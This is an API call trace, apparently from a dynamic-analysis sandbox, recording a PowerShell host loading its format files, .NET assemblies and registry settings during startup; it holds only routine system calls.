	[0743.747] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x88aa5358, Data2=0x21b2, Data3=0x47ad, Data4=([0]=0x91, [1]=0x88, [2]=0x89, [3]=0x7d, [4]=0xeb, [5]=0x20, [6]=0xa4, [7]=0xa8))) returned 0x0
	[0743.747] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x506c3ca7, Data2=0x3d11, Data3=0x466c, Data4=([0]=0xaa, [1]=0x8d, [2]=0xeb, [3]=0x1c, [4]=0xc2, [5]=0x38, [6]=0xe7, [7]=0x56))) returned 0x0
	[0743.748] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x86d7bbd7, Data2=0x8ca2, Data3=0x42ec, Data4=([0]=0x85, [1]=0xa4, [2]=0xd5, [3]=0xae, [4]=0x92, [5]=0xa6, [6]=0x1, [7]=0xeb))) returned 0x0
	[0743.749] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0xb5b1089f, Data2=0xf88a, Data3=0x47d9, Data4=([0]=0x86, [1]=0xa1, [2]=0xfa, [3]=0x12, [4]=0xb5, [5]=0xe8, [6]=0x83, [7]=0xca))) returned 0x0
	[0743.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x18cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0743.749] SetErrorMode (uMode=0x1) returned 0x1
	[0743.750] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x30c
	[0743.750] GetFileType (hFile=0x30c) returned 0x1
	[0743.750] SetErrorMode (uMode=0x1) returned 0x1
	[0743.750] GetFileType (hFile=0x30c) returned 0x1
	[0743.750] ReadFile (in: hFile=0x30c, lpBuffer=0x32dd160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x32dd160*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0743.751] ReadFile (in: hFile=0x30c, lpBuffer=0x32dd160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x32dd160*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0743.751] ReadFile (in: hFile=0x30c, lpBuffer=0x32dd160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x32dd160*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0743.751] ReadFile (in: hFile=0x30c, lpBuffer=0x32dd160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x32dd160*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0743.752] ReadFile (in: hFile=0x30c, lpBuffer=0x32dd160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x32dd160*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0743.752] ReadFile (in: hFile=0x30c, lpBuffer=0x32dd160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x32dd160*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0743.752] ReadFile (in: hFile=0x30c, lpBuffer=0x32dd160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x32dd160*, lpNumberOfBytesRead=0x18d178*=0xaca, lpOverlapped=0x0) returned 1
	[0743.752] ReadFile (in: hFile=0x30c, lpBuffer=0x32dc792, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x32dc792*, lpNumberOfBytesRead=0x18d178*=0x0, lpOverlapped=0x0) returned 1
	[0743.752] ReadFile (in: hFile=0x30c, lpBuffer=0x32dd160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x32dd160*, lpNumberOfBytesRead=0x18d178*=0x0, lpOverlapped=0x0) returned 1
	[0743.753] CloseHandle (hObject=0x30c) returned 1
	[0743.753] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x18cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0743.753] SetErrorMode (uMode=0x1) returned 0x1
	[0743.753] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x18d120 | out: lpFileInformation=0x18d120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0743.753] SetErrorMode (uMode=0x1) returned 0x1
	[0743.753] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x18ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0743.753] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d208 | out: phkResult=0x18d208*=0x30c) returned 0x0
	[0743.753] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18d18c, lpData=0x0, lpcbData=0x18d188*=0x0 | out: lpType=0x18d18c*=0x1, lpData=0x0, lpcbData=0x18d188*=0x56) returned 0x0
	[0743.754] CoTaskMemAlloc (cb=0x5a) returned 0x261ef0
	[0743.754] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18d15c, lpData=0x261ef0, lpcbData=0x18d158*=0x56 | out: lpType=0x18d15c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x18d158*=0x56) returned 0x0
	[0743.754] CoTaskMemFree (pv=0x261ef0) 
	[0743.754] RegCloseKey (hKey=0x30c) returned 0x0
	[0743.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x18ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0743.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x18cd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0743.763] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x18c690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0743.765] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18c690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0743.775] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x18c690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0745.175] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0745.185] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x18c690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0745.190] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x18c690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0745.191] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x18c690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0745.193] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x18c690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0745.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x18c690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0745.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x18c690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0745.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x18c690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0745.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x18c690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0745.205] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x18c690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50
	[0745.207] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x18c690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e
	[0746.607] VirtualQuery (in: lpAddress=0x18bca0, lpBuffer=0x18cb60, dwLength=0x30 | out: lpBuffer=0x18cb60*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0746.608] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0xcabfb420, Data2=0xa356, Data3=0x4812, Data4=([0]=0x91, [1]=0x70, [2]=0x1c, [3]=0x78, [4]=0x94, [5]=0x85, [6]=0x8a, [7]=0x30))) returned 0x0
	[0746.609] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x111a025, Data2=0x8660, Data3=0x434d, Data4=([0]=0x94, [1]=0x23, [2]=0x51, [3]=0xf6, [4]=0xf5, [5]=0xe5, [6]=0x78, [7]=0x76))) returned 0x0
	[0746.609] VirtualQuery (in: lpAddress=0x18be50, lpBuffer=0x18cd10, dwLength=0x30 | out: lpBuffer=0x18cd10*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0746.610] VirtualQuery (in: lpAddress=0x18be50, lpBuffer=0x18cd10, dwLength=0x30 | out: lpBuffer=0x18cd10*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0746.611] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0xf30169f6, Data2=0xddd8, Data3=0x4a2f, Data4=([0]=0x9e, [1]=0xff, [2]=0xb3, [3]=0x12, [4]=0x5e, [5]=0xac, [6]=0x23, [7]=0x22))) returned 0x0
	[0746.614] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x4645cd36, Data2=0x2569, Data3=0x4eb7, Data4=([0]=0x84, [1]=0x83, [2]=0xce, [3]=0x1f, [4]=0x7e, [5]=0x7c, [6]=0x27, [7]=0xfe))) returned 0x0
	[0746.614] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0xc6c8b164, Data2=0xb1d2, Data3=0x42d3, Data4=([0]=0xb3, [1]=0x99, [2]=0x57, [3]=0xa4, [4]=0xcb, [5]=0xa4, [6]=0x52, [7]=0xae))) returned 0x0
	[0746.615] VirtualQuery (in: lpAddress=0x18b710, lpBuffer=0x18c5d0, dwLength=0x30 | out: lpBuffer=0x18c5d0*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0746.615] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x2806cf45, Data2=0xeef2, Data3=0x4a16, Data4=([0]=0xa7, [1]=0x66, [2]=0x3, [3]=0xff, [4]=0xe1, [5]=0xf8, [6]=0x1c, [7]=0xde))) returned 0x0
	[0746.616] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x9c580618, Data2=0x1879, Data3=0x4572, Data4=([0]=0xb8, [1]=0xc8, [2]=0x15, [3]=0xc5, [4]=0xa7, [5]=0xd5, [6]=0xee, [7]=0x9))) returned 0x0
	[0746.616] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x30c
	[0746.616] GetFileType (hFile=0x30c) returned 0x1
	[0746.616] SetErrorMode (uMode=0x1) returned 0x1
	[0746.616] GetFileType (hFile=0x30c) returned 0x1
	[0746.616] ReadFile (in: hFile=0x30c, lpBuffer=0x338f758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x338f758*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0746.617] ReadFile (in: hFile=0x30c, lpBuffer=0x338f758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x338f758*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0746.618] ReadFile (in: hFile=0x30c, lpBuffer=0x338f758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x338f758*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0746.618] ReadFile (in: hFile=0x30c, lpBuffer=0x338f758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x338f758*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0746.618] ReadFile (in: hFile=0x30c, lpBuffer=0x338f758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x338f758*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0746.618] ReadFile (in: hFile=0x30c, lpBuffer=0x338f758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x338f758*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0746.618] ReadFile (in: hFile=0x30c, lpBuffer=0x338f758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x338f758*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0746.619] ReadFile (in: hFile=0x30c, lpBuffer=0x338f758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x338f758*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0747.902] ReadFile (in: hFile=0x30c, lpBuffer=0x338f758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x338f758*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0747.902] ReadFile (in: hFile=0x30c, lpBuffer=0x338f758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x338f758*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0747.902] ReadFile (in: hFile=0x30c, lpBuffer=0x338f758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x338f758*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0747.902] ReadFile (in: hFile=0x30c, lpBuffer=0x338f758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x338f758*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0747.903] ReadFile (in: hFile=0x30c, lpBuffer=0x338f758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x338f758*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0747.903] ReadFile (in: hFile=0x30c, lpBuffer=0x338f758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x338f758*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0747.903] ReadFile (in: hFile=0x30c, lpBuffer=0x338f758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x338f758*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0747.904] ReadFile (in: hFile=0x30c, lpBuffer=0x338f758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x338f758*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0747.906] ReadFile (in: hFile=0x30c, lpBuffer=0x338f758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x338f758*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0747.907] ReadFile (in: hFile=0x30c, lpBuffer=0x338f758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x338f758*, lpNumberOfBytesRead=0x18d178*=0xbce, lpOverlapped=0x0) returned 1
	[0747.907] ReadFile (in: hFile=0x30c, lpBuffer=0x338ee8e, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x338ee8e*, lpNumberOfBytesRead=0x18d178*=0x0, lpOverlapped=0x0) returned 1
	[0747.907] ReadFile (in: hFile=0x30c, lpBuffer=0x338f758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x338f758*, lpNumberOfBytesRead=0x18d178*=0x0, lpOverlapped=0x0) returned 1
	[0747.907] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d208 | out: phkResult=0x18d208*=0x30c) returned 0x0
	[0747.908] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18d18c, lpData=0x0, lpcbData=0x18d188*=0x0 | out: lpType=0x18d18c*=0x1, lpData=0x0, lpcbData=0x18d188*=0x56) returned 0x0
	[0747.908] CoTaskMemAlloc (cb=0x5a) returned 0x1b941920
	[0747.908] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18d15c, lpData=0x1b941920, lpcbData=0x18d158*=0x56 | out: lpType=0x18d15c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x18d158*=0x56) returned 0x0
	[0747.908] CoTaskMemFree (pv=0x1b941920) 
	[0747.908] RegCloseKey (hKey=0x30c) returned 0x0
	[0747.908] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x18ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0747.908] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x18cd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0747.909] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0xe0838d43, Data2=0x47fa, Data3=0x4a2e, Data4=([0]=0x8b, [1]=0xa3, [2]=0x91, [3]=0x0, [4]=0x35, [5]=0x6b, [6]=0x57, [7]=0xeb))) returned 0x0
	[0747.909] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x543f6517, Data2=0x22c6, Data3=0x4add, Data4=([0]=0x93, [1]=0xd9, [2]=0x42, [3]=0xbc, [4]=0x37, [5]=0xf0, [6]=0x24, [7]=0xbc))) returned 0x0
	[0747.910] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x5088fd85, Data2=0xa49a, Data3=0x47bf, Data4=([0]=0x93, [1]=0xa1, [2]=0x6, [3]=0x5c, [4]=0x7a, [5]=0x1e, [6]=0x11, [7]=0x28))) returned 0x0
	[0747.910] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0xb5a9f6e, Data2=0x2f75, Data3=0x42ae, Data4=([0]=0xae, [1]=0x81, [2]=0x78, [3]=0x6b, [4]=0x40, [5]=0xab, [6]=0x6f, [7]=0xd5))) returned 0x0
	[0747.910] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x9f450ebd, Data2=0xc548, Data3=0x4239, Data4=([0]=0x9f, [1]=0x84, [2]=0xbe, [3]=0xad, [4]=0xea, [5]=0x54, [6]=0xd0, [7]=0xe2))) returned 0x0
	[0747.910] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0xb7708a57, Data2=0x835b, Data3=0x4207, Data4=([0]=0xbf, [1]=0x18, [2]=0x72, [3]=0x6a, [4]=0x40, [5]=0x13, [6]=0xc5, [7]=0x7f))) returned 0x0
	[0747.910] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0xe390d70b, Data2=0x572c, Data3=0x46c5, Data4=([0]=0xa4, [1]=0x3b, [2]=0x2, [3]=0x5a, [4]=0x87, [5]=0x16, [6]=0x72, [7]=0x62))) returned 0x0
	[0747.911] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x3b31c169, Data2=0xd69c, Data3=0x456a, Data4=([0]=0x89, [1]=0xe0, [2]=0x54, [3]=0x5a, [4]=0x17, [5]=0x79, [6]=0x69, [7]=0x81))) returned 0x0
	[0747.911] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x6c5f574d, Data2=0x7f9a, Data3=0x4d50, Data4=([0]=0x88, [1]=0x8e, [2]=0x33, [3]=0x3f, [4]=0x8d, [5]=0x2, [6]=0xc1, [7]=0xac))) returned 0x0
	[0747.911] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x17f2573e, Data2=0xdb2d, Data3=0x4748, Data4=([0]=0x8d, [1]=0x86, [2]=0x2b, [3]=0xdb, [4]=0xae, [5]=0x10, [6]=0x1f, [7]=0x5a))) returned 0x0
	[0747.911] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0xcdcc3148, Data2=0x4125, Data3=0x4257, Data4=([0]=0xb0, [1]=0x81, [2]=0x43, [3]=0x2e, [4]=0x67, [5]=0xc2, [6]=0x36, [7]=0xfa))) returned 0x0
